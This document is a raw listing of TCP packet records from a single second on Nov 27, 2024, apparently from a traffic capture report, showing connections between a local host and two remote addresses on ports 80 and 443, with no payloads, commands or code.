                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549042940 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549063921 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549073935 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549084902 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549094915 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549108028 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549118042 CET4434979513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549119949 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549119949 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549119949 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549124956 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549137115 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549146891 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549159050 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549169064 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549179077 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549182892 CET4434979513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549187899 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549199104 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549210072 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549222946 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549232960 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549235106 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549236059 CET49795443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549245119 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549266100 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549266100 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549266100 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549274921 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549285889 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549295902 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549309969 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549318075 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549320936 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549331903 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549341917 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549352884 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549357891 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549357891 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549370050 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549381971 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549396992 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549407959 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549413919 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549413919 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549413919 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549418926 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549424887 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549431086 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549439907 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549446106 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549451113 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549462080 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549472094 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549479008 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549483061 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549484015 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549494982 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549505949 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549510956 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549516916 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549527884 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549540043 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549542904 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549542904 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549551010 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549562931 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549573898 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549582958 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549586058 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549596071 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549607038 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549617052 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549617052 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549628973 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549638033 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549649000 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549659014 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549662113 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549662113 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549669981 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549680948 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549694061 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549695969 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549705029 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549715042 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549717903 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549726963 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549732924 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549736977 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549742937 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549751997 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549756050 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549766064 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549777985 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549787998 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549793005 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549798965 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549810886 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549820900 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549823999 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549823999 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549832106 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549843073 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549851894 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549863100 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549875021 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549879074 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549880028 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549880028 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549886942 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549904108 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549911022 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549916029 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549921036 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549922943 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549925089 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549925089 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549930096 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549932003 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549938917 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549942970 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549952984 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549964905 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549976110 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549987078 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549993992 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549993992 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.549998045 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550009966 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550019979 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550031900 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550049067 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550049067 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550050020 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550050974 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550061941 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550074100 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550085068 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550095081 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550107002 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550116062 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550131083 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550131083 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550131083 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550156116 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550156116 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550618887 CET49795443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550643921 CET4434979513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550661087 CET49795443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.550668001 CET4434979513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.554301023 CET49800443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.554342985 CET4434980013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.554410934 CET49800443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.554874897 CET49800443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.554888964 CET4434980013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.580727100 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.594137907 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.682797909 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.683033943 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.683157921 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.683466911 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.683665991 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.683769941 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.684524059 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.684727907 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.684812069 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.684854984 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.685769081 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.685863018 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.685863018 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.686712027 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.686778069 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.686798096 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.687814951 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.687905073 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.687947989 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.688575983 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.688740015 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.688791990 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.689470053 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.689579010 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.689701080 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.690129042 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.690254927 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.690290928 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.690984964 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.691080093 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.691144943 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.691802979 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.691848040 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.691906929 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.692725897 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.692847967 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.692884922 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.693670988 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.693732023 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.693814039 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.694478035 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.694534063 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.694680929 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.695358038 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.695426941 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.695434093 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.696208954 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.696270943 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.696290016 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.696937084 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.697011948 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.697158098 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.698060036 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.698085070 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.698172092 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.698713064 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.698781013 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.698842049 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.699268103 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.699321985 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.699326992 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.699871063 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.699909925 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.699914932 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.700535059 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.700669050 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.700681925 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.701165915 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.701239109 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.701381922 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.701821089 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.701850891 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.701877117 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.702558041 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.702609062 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.702660084 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.703236103 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.703330994 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.703413963 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.704071999 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.704209089 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.704267025 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.704834938 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.704920053 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.704926968 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.705621004 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.705696106 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.705698967 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.706558943 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.706693888 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.706753016 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.707407951 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.707484007 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.707536936 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.708488941 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.708591938 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.708683014 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.709395885 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.709635019 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.709727049 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.710567951 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.710628033 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.710690022 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.711493015 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.711596012 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.711703062 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.712380886 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.712438107 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:59.712605000 CET8049792185.215.113.16192.168.2.10
